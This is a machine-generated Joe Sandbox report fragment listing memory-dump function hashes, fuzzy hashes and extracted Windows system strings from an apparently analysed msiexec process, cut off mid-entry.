                                            • Opcode ID: 6b34d8c5d8912e9b5cc5ca1d3e30aed566f22b07759268fc3e5d73876732a191
                                            • Instruction ID: 84fb9c3e806f7ab814d94a82268733e66c1b46ef57e0457311946a456ddfc5bb
                                            • Opcode Fuzzy Hash: 6b34d8c5d8912e9b5cc5ca1d3e30aed566f22b07759268fc3e5d73876732a191
                                            • Instruction Fuzzy Hash: 4A61CE75A08B499BDB91CFA8D840BADB7F5FF44715F04066AE801EF290EB74E940C762
                                            Strings
                                            • RedirectedKey, xrefs: 1FDEBA8E
                                            • \Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\, xrefs: 1FDEBA44
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2098966871.000000001FCE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FCE0000, based on PE: true
                                            • Associated: 00000008.00000002.2098966871.000000001FE09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1fce0000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: RedirectedKey$\Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\
                                            • API String ID: 0-1388552009
                                            • Opcode ID: 65201f5dc9ab008a663ec8e955a8a6cba166b617df9266e66c92ef2422a25e3c
                                            • Instruction ID: 729a55e8a3be759d77f4585292e313f6cd45c628da59271c302f2c4ff6d9d99b
                                            • Opcode Fuzzy Hash: 65201f5dc9ab008a663ec8e955a8a6cba166b617df9266e66c92ef2422a25e3c
                                            • Instruction Fuzzy Hash: 5A6114B5D0022DEBCB50DF94C888AEEBFB8FF08714F54406AE505A7201E735AA45DFA0
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2098966871.000000001FCE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FCE0000, based on PE: true
                                            • Associated: 00000008.00000002.2098966871.000000001FE09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1fce0000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 0$Flst
                                            • API String ID: 0-758220159
                                            • Opcode ID: 25033ccc102bef10e2be49ffee3bae0bc01a4cca2a979542cf597b22fa3d97ad
                                            • Instruction ID: 9cdb70066214ea0d524ffe9b210c68093a2c5050950100f3ff1766cb2b557df8
                                            • Opcode Fuzzy Hash: 25033ccc102bef10e2be49ffee3bae0bc01a4cca2a979542cf597b22fa3d97ad
                                            • Instruction Fuzzy Hash: EA51AEB1E003958FCB55CF99C8846ADFBF4EF46358F25806AD4499F650EB70A985CB80
                                            Strings
                                            • RtlpInsertAssemblyStorageMapEntry, xrefs: 1FD82807
                                            • SXS: %s() bad parametersSXS: Map : %pSXS: AssemblyRosterIndex : 0x%lxSXS: Map->AssemblyCount : 0x%lxSXS: StorageLocation : %pSXS: StorageLocation->Length: 0x%xSXS: StorageLocation->Buffer: %pSXS: OpenDirectoryHand, xrefs: 1FD8280C
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2098966871.000000001FCE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FCE0000, based on PE: true
                                            • Associated: 00000008.00000002.2098966871.000000001FE09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1fce0000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: RtlpInsertAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: AssemblyRosterIndex : 0x%lxSXS: Map->AssemblyCount : 0x%lxSXS: StorageLocation : %pSXS: StorageLocation->Length: 0x%xSXS: StorageLocation->Buffer: %pSXS: OpenDirectoryHand
                                            • API String ID: 0-2104531740
                                            • Opcode ID: 6ec09c9d07eef757ff180c85771ce962563d28d76da52cd32b55e9664b28eb04
                                            • Instruction ID: faa896f7f785891df51e787c5cc6895d54a9466448e5b3f9d62ecfe5d10f4a54
                                            • Opcode Fuzzy Hash: 6ec09c9d07eef757ff180c85771ce962563d28d76da52cd32b55e9664b28eb04
                                            • Instruction Fuzzy Hash: C841D439600615EBD754CF56C840ABAF3B5FF95B12F21812DE8849BA84E730ED41CBA0
                                            Strings
                                            • @, xrefs: 1FD51050
                                            • \Registry\Machine\System\CurrentControlSet\Control, xrefs: 1FD51025
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2098966871.000000001FCE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FCE0000, based on PE: true
                                            • Associated: 00000008.00000002.2098966871.000000001FE09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1fce0000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$\Registry\Machine\System\CurrentControlSet\Control
                                            • API String ID: 0-2976085014
                                            • Opcode ID: 62a5fe7790b286d9a93957ca025d4af8183b790f4616da3f6e99c9ff09ae0f59
                                            • Instruction ID: c1dc5c0e5dd469fde07bda7d1f931ff8badf9b4f2da19db9287dde34e31ec3c2
                                            • Opcode Fuzzy Hash: 62a5fe7790b286d9a93957ca025d4af8183b790f4616da3f6e99c9ff09ae0f59
                                            • Instruction Fuzzy Hash: 8831B476900689ABDF52DFA5CC84FAFBBB8EBC4750F410525F500A72A0DB35AD05DBA0
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2098966871.000000001FCE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FCE0000, based on PE: true
                                            • Associated: 00000008.00000002.2098966871.000000001FE09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1fce0000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Bh($NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                            • API String ID: 0-1295717495
                                            • Opcode ID: 4ccd754d6669633ac502db69727ced6ee9be5047b0b2a35e49efea1c73e1dcb0
                                            • Instruction ID: 9d85515a045789590a884ef477bf49a1d08a6c42810648d89d2527945bbe25c8
                                            • Opcode Fuzzy Hash: 4ccd754d6669633ac502db69727ced6ee9be5047b0b2a35e49efea1c73e1dcb0
                                            • Instruction Fuzzy Hash: 6231F4B2A00654EFDB45DF64CC45FAEB7B5FB84720F218766F505A7680D73AA800CBA1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2098966871.000000001FCE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FCE0000, based on PE: true
                                            • Associated: 00000008.00000002.2098966871.000000001FE09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1fce0000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @
                                            • API String ID: 0-2766056989
                                            • Opcode ID: a4380bf780ab9ed4873772837a0b2e2e437faa41978b3ecc4ea10ce72af10d1c
                                            • Instruction ID: 66ab35182f73073e9bb94953b88b3ffee189ac4f65af51d5b375d58f441b8075
                                            • Opcode Fuzzy Hash: a4380bf780ab9ed4873772837a0b2e2e437faa41978b3ecc4ea10ce72af10d1c
                                            • Instruction Fuzzy Hash: 5A328974D0836ACFDBA1CF64D944BEDBBB0BB49304F4441E9D449AB281EB756A84CF90
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2098966871.000000001FCE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FCE0000, based on PE: true
                                            • Associated: 00000008.00000002.2098966871.000000001FE09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1fce0000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: PATH
                                            • API String ID: 0-1036084923
                                            • Opcode ID: 96e89cbe857edec0ffb15751252f252b2e939206b75c2289723383ccea7d66f9
                                            • Instruction ID: 82cf256e4bfd3d602d116f57208475c19a894fa29f94d9886dcac50fd997febb
                                            • Opcode Fuzzy Hash: 96e89cbe857edec0ffb15751252f252b2e939206b75c2289723383ccea7d66f9
                                            • Instruction Fuzzy Hash: 36F1CF75E04228DBDB54DFA8E880AFEB7B1FF88710F554029E444AF290EB35A851CF60
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2098966871.000000001FCE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FCE0000, based on PE: true
                                            • Associated: 00000008.00000002.2098966871.000000001FE09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1fce0000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Bh(
                                            • API String ID: 0-2376666768
                                            • Opcode ID: 5646936d8bf5276b5d9e0cd9bfdb937be3fd3900ebbfb1e740dce5c7a9319d74
                                            • Instruction ID: a990c14b08aa77b3bfd069a05950132a707ecc1ee0ed0192634bdad3dff0a944
                                            • Opcode Fuzzy Hash: 5646936d8bf5276b5d9e0cd9bfdb937be3fd3900ebbfb1e740dce5c7a9319d74
                                            • Instruction Fuzzy Hash: B6618D75A00745DFDB88DF68C881ABEB7F5BF48314F218569E511AB2D0EB31A901CFA4
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2098966871.000000001FCE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FCE0000, based on PE: true
                                            • Associated: 00000008.00000002.2098966871.000000001FE09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1fce0000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: CWDIllegalInDLLSearch
                                            • API String ID: 0-473384322
                                            • Opcode ID: d607c69bf0ecba8c00c048731d1a9ab105058149cf79e92142095d18ebfd956e
                                            • Instruction ID: c370f2da0c47b2e364dbba72873f4ee9cf3439d4142de8d46a19a379462c298f
                                            • Opcode Fuzzy Hash: d607c69bf0ecba8c00c048731d1a9ab105058149cf79e92142095d18ebfd956e
                                            • Instruction Fuzzy Hash: 4F51A1799047529BD751CEA5C881B7AB7ECFB44720F001B2AF961D7290DB32E944CBA2
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2098966871.000000001FCE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FCE0000, based on PE: true
                                            • Associated: 00000008.00000002.2098966871.000000001FE09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1fce0000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: AlternateCodePage
                                            • API String ID: 0-3889302423
                                            • Opcode ID: 322f3a5d27ada33b3043301c8fc913fe2b455dcfd05f6dc1df65984ec3fbfeee
                                            • Instruction ID: fad2027997ab78a757090fd40eddd2e4569fec0e052a406e849a58f069d4e529
                                            • Opcode Fuzzy Hash: 322f3a5d27ada33b3043301c8fc913fe2b455dcfd05f6dc1df65984ec3fbfeee
                                            • Instruction Fuzzy Hash: 2141B276D00309ABDF55DB99CC80AFEB7B8FF85320F11415AE455E7290E630AA41CBA1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2098966871.000000001FCE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FCE0000, based on PE: true
                                            • Associated: 00000008.00000002.2098966871.000000001FE09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1fce0000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @
                                            • API String ID: 0-2766056989
                                            • Opcode ID: f6d24db04a8b22f10dd332497e656ae38b365cd664294fb4cdc3bf0e0e6027ed
                                            • Instruction ID: 448259a0b9586fab3192e678228df59eb387b7e4a67410da55f92c755c7dd778
                                            • Opcode Fuzzy Hash: f6d24db04a8b22f10dd332497e656ae38b365cd664294fb4cdc3bf0e0e6027ed
                                            • Instruction Fuzzy Hash: 9E516C755047109FC321CF29C840A6BB7F8FF88B10F008A2EF995976A0E7B4E954CBA1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2098966871.000000001FCE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FCE0000, based on PE: true
                                            • Associated: 00000008.00000002.2098966871.000000001FE09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1fce0000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LdrpInitializeProcess
                                            • API String ID: 0-2689506271
                                            • Opcode ID: 39bac18c696ef2b129824a629cbd01adf904847bf61449c4de620893a8e03307
                                            • Instruction ID: 2e4f3b11cef922a38c43b504c56265950d2ff0044af91b3e1a3adb9f05e9b8d8
                                            • Opcode Fuzzy Hash: 39bac18c696ef2b129824a629cbd01adf904847bf61449c4de620893a8e03307
                                            • Instruction Fuzzy Hash: 5341F372505356AFD351EFA0C988ABBB7ECFB84724F00492AF1A086180E775E554CBB2
                                            Strings
                                            • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 1FD10058
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2098966871.000000001FCE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FCE0000, based on PE: true
                                            • Associated: 00000008.00000002.2098966871.000000001FE09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1fce0000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode
                                            • API String ID: 0-996340685
                                            • Opcode ID: fb2d23ba7db4bd283e9e2c5a3fb6762adc49f8d9c65550263c1b789a36885c54
                                            • Instruction ID: 8fc6f29094784b41d978604439c43226f7aa1e09b0709cf353c9e528b3029d50
                                            • Opcode Fuzzy Hash: fb2d23ba7db4bd283e9e2c5a3fb6762adc49f8d9c65550263c1b789a36885c54
                                            • Instruction Fuzzy Hash: 25417E75A1474A9BC765EFB4D4406EAB7F4AF45300F10492AD5AACB240E334A645CBA1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2098966871.000000001FCE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FCE0000, based on PE: true
                                            • Associated: 00000008.00000002.2098966871.000000001FE09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1fce0000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: BinaryName
                                            • API String ID: 0-215506332
                                            • Opcode ID: 08f4f3664729a8278f6288bebc5d197d652779d616c6328b5b9b8a2e0eb72c0f
                                            • Instruction ID: b48d063ccd7945d6607f326e077bad5f481cfe2dd9d9c05dacdb9d81115e21a1
                                            • Opcode Fuzzy Hash: 08f4f3664729a8278f6288bebc5d197d652779d616c6328b5b9b8a2e0eb72c0f
                                            • Instruction Fuzzy Hash: 9A31D17A900E25EFDB55CB58C845E7FB7B4EF80720F014169E815AB290E730AE04CBE0
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2098966871.000000001FCE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FCE0000, based on PE: true
                                            • Associated: 00000008.00000002.2098966871.000000001FE09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1fce0000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: WindowsExcludedProcs
                                            • API String ID: 0-3583428290
                                            • Opcode ID: 34a5547e051765790c2c8ceff76a078c61e809f66b40f98c98d16d0ff40d25f6
                                            • Instruction ID: d9f5f567416b2afa309fe4a5faf56d93c8160a354e496df7887b622bb2380ba2
                                            • Opcode Fuzzy Hash: 34a5547e051765790c2c8ceff76a078c61e809f66b40f98c98d16d0ff40d25f6
                                            • Instruction Fuzzy Hash: 3A21077B901315AFCB92CA58D840FBB77BDAF91795F024226BA049F114DA30ED058BA0
                                            Strings
                                            • Critical error detected %lx, xrefs: 1FDC7027
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2098966871.000000001FCE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FCE0000, based on PE: true
                                            • Associated: 00000008.00000002.2098966871.000000001FE09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1fce0000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Critical error detected %lx
                                            • API String ID: 0-802127002
                                            • Opcode ID: 24cfed1d9d68f68eedc93dd2811346514ae0b5df60c62ac903a2d872b3dc39d1
                                            • Instruction ID: e1729aed9e976fa4b0b3f58fac3032f59cac4662db378e3324eac00551983c27
                                            • Opcode Fuzzy Hash: 24cfed1d9d68f68eedc93dd2811346514ae0b5df60c62ac903a2d872b3dc39d1
                                            • Instruction Fuzzy Hash: 8C11697AD14348CBDB61CFA8D902BEDFBB1EB04718F21422ED165AB282E7352505DF14
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2098966871.000000001FCE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FCE0000, based on PE: true
                                            • Associated: 00000008.00000002.2098966871.000000001FE09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1fce0000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: adf244dcaeb3e9dbc9da7b97d7e532065498b19f1db0773b17b88cf4ced611f4
                                            • Instruction ID: a5df8dbcb7f3f8b14146fd4289172a49dbdee9d2ea10925a608a8d901392d9ef
                                            • Opcode Fuzzy Hash: adf244dcaeb3e9dbc9da7b97d7e532065498b19f1db0773b17b88cf4ced611f4
                                            • Instruction Fuzzy Hash: EA228E356047128FD758CF28C490A6AB7E1FF89325B148A6DF996CB391E730F846CB91
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2098966871.000000001FCE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FCE0000, based on PE: true
                                            • Associated: 00000008.00000002.2098966871.000000001FE09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1fce0000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a0ebd27b085325e62482a478f96ab155ff32e96304500dc32f07032a11141871
                                            • Instruction ID: 1e27af12f53427d66246fa7af236a4f185ed62ec3f69d165b4dcbcc78dd5ea9a
                                            • Opcode Fuzzy Hash: a0ebd27b085325e62482a478f96ab155ff32e96304500dc32f07032a11141871
                                            • Instruction Fuzzy Hash: 8B22C3B5E0025ADBCB84CFA5C4919BEFBF2FF44305B14825AE985AB241E735ED41CB60
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2098966871.000000001FCE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FCE0000, based on PE: true
                                            • Associated: 00000008.00000002.2098966871.000000001FE09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1fce0000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a1bb5e2d712855a644f82f65a5c8c3964a816a947b14bca23fbce39b9a083d73
                                            • Instruction ID: cbe048b19cb7185e967b232f53ed633b2b18fea2645143a98e2aa98ea3b61890
                                            • Opcode Fuzzy Hash: a1bb5e2d712855a644f82f65a5c8c3964a816a947b14bca23fbce39b9a083d73
                                            • Instruction Fuzzy Hash: 04328BB5A05345CFCB94CF68D480BAAB7F2FF48314F108669E995AF391DB34A841CB90
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2098966871.000000001FCE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FCE0000, based on PE: true
                                            • Associated: 00000008.00000002.2098966871.000000001FE09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1fce0000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                            • Instruction ID: ccb60205287e1890ef7e88df1d9f262371b692efea1daff6b6799f203a3586ad
                                            • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                            • Instruction Fuzzy Hash: 73F182B8E0030A9BCB54CFA5D590BFEB7F5AF45715F058129EA45AB344E738E841CB60
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2098966871.000000001FCE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FCE0000, based on PE: true
                                            • Associated: 00000008.00000002.2098966871.000000001FE09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1fce0000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 05e21a9a9a51b74f341277f93be372ed1c47720848c8be28cef72cf90284be64
                                            • Instruction ID: 142855a255bf163f3b5349cbf7c683242ff5c46d7dbc1cfa639c8fe583c89d86
                                            • Opcode Fuzzy Hash: 05e21a9a9a51b74f341277f93be372ed1c47720848c8be28cef72cf90284be64
                                            • Instruction Fuzzy Hash: 17E126B5D00748CFCBA5CFA9D980AADFBF1BF48315F10466AE585AB260D771A846CF10
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2098966871.000000001FCE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FCE0000, based on PE: true
                                            • Associated: 00000008.00000002.2098966871.000000001FE09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1fce0000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f7c6ddd51e254e5830832f2f3e7f914205fd3b449cfda4bbb72ed57c96893077
                                            • Instruction ID: 0b7695c1a7c78ac852075ecfd56e3efb7de574b573ea9d844b1eac966cce0615
                                            • Opcode Fuzzy Hash: f7c6ddd51e254e5830832f2f3e7f914205fd3b449cfda4bbb72ed57c96893077
                                            • Instruction Fuzzy Hash: A6C160B4E04359DFDB54CFE8C884AADBBB5FF88309F104229E505AB255EB71A841CF90
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2098966871.000000001FCE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FCE0000, based on PE: true
                                            • Associated: 00000008.00000002.2098966871.000000001FE09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1fce0000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9e5fc7f2bb55bcedb83ce3d0d80e3d0f63801a1d51d1df9b7b5e4e5b5feed352
                                            • Instruction ID: e3aca0994779fb0f2f481a6cc565c5e327f1d52b356efe6524e51d9c2c3316bd
                                            • Opcode Fuzzy Hash: 9e5fc7f2bb55bcedb83ce3d0d80e3d0f63801a1d51d1df9b7b5e4e5b5feed352
                                            • Instruction Fuzzy Hash: D38194B1A007169BDB54CF69C950ABEBBF9FB4C710F10852EE445DB680E734E940CBA4
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2098966871.000000001FCE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FCE0000, based on PE: true
                                            • Associated: 00000008.00000002.2098966871.000000001FE09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1fce0000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                            • Instruction ID: 30465008b251993bb7c29c579073f742a5b00728524934711439636069afe924
